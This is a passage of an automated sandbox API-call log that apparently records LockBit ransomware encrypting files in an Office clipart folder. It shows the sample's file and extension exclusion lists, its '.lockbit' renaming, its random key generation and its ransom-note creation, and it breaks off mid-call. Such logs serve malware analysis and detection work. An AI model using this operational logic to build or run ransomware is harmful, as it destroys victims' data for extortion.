[0142.164] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0142.165] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.165] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0142.165] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0142.165] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0142.165] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0142.165] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107724.WMF") returned 1 [0142.165] lstrcmpiW (lpString1="ntldr", lpString2="J0107724.WMF") returned 1 [0142.165] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107724.WMF") returned 1 [0142.165] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107724.WMF") returned -1 [0142.165] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107724.WMF") returned -1 [0142.165] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107724.WMF") returned 1 [0142.165] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107724.WMF") returned -1 [0142.165] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.165] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF") returned=".WMF" [0142.165] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0142.165] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0142.165] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0142.165] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0142.165] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0142.165] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0142.165] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0142.165] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0142.165] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0142.165] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0142.165] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0142.165] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0142.166] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0142.166] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0142.166] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0142.166] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0142.166] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0142.166] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0142.166] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0142.166] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0142.166] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0142.166] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0142.166] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0142.166] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0142.166] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0142.166] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0142.166] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0142.166] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0142.166] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF.lockbit") returned 72 [0142.166] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107724.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0142.167] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.167] malloc (_Size=0x40068) returned 0x1ff1e60 [0142.167] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7016) returned 1 [0142.167] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.167] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.167] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0142.167] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.168] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.168] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0142.168] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.172] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.172] malloc (_Size=0xa6) returned 0x77d7a8 [0142.172] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.179] free (_Block=0x77d7a8) [0142.179] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.179] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.179] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.179] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x563ba0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1574, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107728.WMF", cAlternateFileName="")) returned 1 [0142.179] lstrcmpiW (lpString1=".", lpString2="J0107728.WMF") returned -1 [0142.179] lstrcmpiW (lpString1="..", lpString2="J0107728.WMF") returned -1 [0142.179] PathFindExtensionW (pszPath="J0107728.WMF") returned=".WMF" [0142.179] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0142.179] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0142.179] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0142.179] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0142.179] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0142.179] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0142.179] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0142.179] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0142.179] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0142.179] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0142.179] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0142.179] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0142.179] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0142.179] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0142.179] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0142.179] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0142.179] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0142.179] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0142.179] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0142.179] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0142.180] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0142.180] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107728.WMF") returned 1 [0142.180] lstrcmpiW (lpString1="ntldr", lpString2="J0107728.WMF") returned 1 [0142.180] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107728.WMF") returned 1 [0142.181] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107728.WMF") returned -1 [0142.181] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107728.WMF") returned -1 [0142.181] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107728.WMF") returned 1 [0142.181] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107728.WMF") returned -1 [0142.181] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.181] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF") returned=".WMF" [0142.181] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0142.181] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0142.181] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0142.181] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0142.181] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0142.181] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0142.181] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0142.181] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0142.181] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0142.181] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0142.181] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0142.181] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0142.181] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0142.181] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0142.181] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0142.181] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0142.181] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0142.181] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0142.181] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0142.182] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0142.182] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0142.182] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0142.182] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0142.182] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0142.182] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0142.182] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0142.182] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0142.182] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0142.182] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF.lockbit") returned 72 [0142.182] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107728.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0142.182] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.183] malloc (_Size=0x40068) returned 0x3df0008 [0142.183] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5492) returned 1 [0142.183] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.183] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0142.183] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.184] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0142.184] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0142.185] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.185] malloc (_Size=0xa6) returned 0x77d7a8 [0142.186] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.186] free (_Block=0x77d7a8) [0142.186] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.186] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.186] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.186] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x563e0210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xbf4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107730.WMF", cAlternateFileName="")) returned 1 [0142.186] lstrcmpiW (lpString1=".", lpString2="J0107730.WMF") returned -1 [0142.186] lstrcmpiW (lpString1="..", lpString2="J0107730.WMF") returned -1 [0142.186] PathFindExtensionW (pszPath="J0107730.WMF") returned=".WMF" [0142.187] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0142.187] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.188] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0142.188] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0142.188] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0142.188] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0142.188] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0142.188] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0142.188] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0142.188] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0142.188] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0142.188] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0142.188] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0142.188] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0142.188] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0142.188] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0142.188] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0142.188] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0142.188] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0142.188] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.188] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0142.188] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0142.188] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0142.188] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0142.188] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107730.WMF") returned 1 [0142.188] lstrcmpiW (lpString1="ntldr", lpString2="J0107730.WMF") returned 1 [0142.188] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107730.WMF") returned 1 [0142.188] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107730.WMF") returned -1 [0142.188] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107730.WMF") returned -1 [0142.188] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107730.WMF") returned 1 [0142.189] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107730.WMF") returned -1 [0142.189] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.189] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF") returned=".WMF" [0142.189] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0142.189] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0142.189] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0142.189] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0142.189] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0142.189] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0142.189] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0142.189] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0142.189] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0142.189] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0142.189] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0142.189] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0142.189] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0142.189] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0142.189] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0142.189] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0142.189] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0142.189] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0142.189] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0142.189] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0142.189] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0142.189] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0142.189] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0142.189] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0142.190] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0142.190] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0142.190] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0142.190] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0142.190] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF.lockbit") returned 72 [0142.190] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107730.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0142.193] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.193] malloc (_Size=0x40068) returned 0x3d70450 [0142.193] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=3060) returned 1 [0142.193] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.193] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0142.193] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.194] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0142.194] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0142.199] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.199] malloc (_Size=0xa6) returned 0x77d7a8 [0142.199] NtSetInformationFile 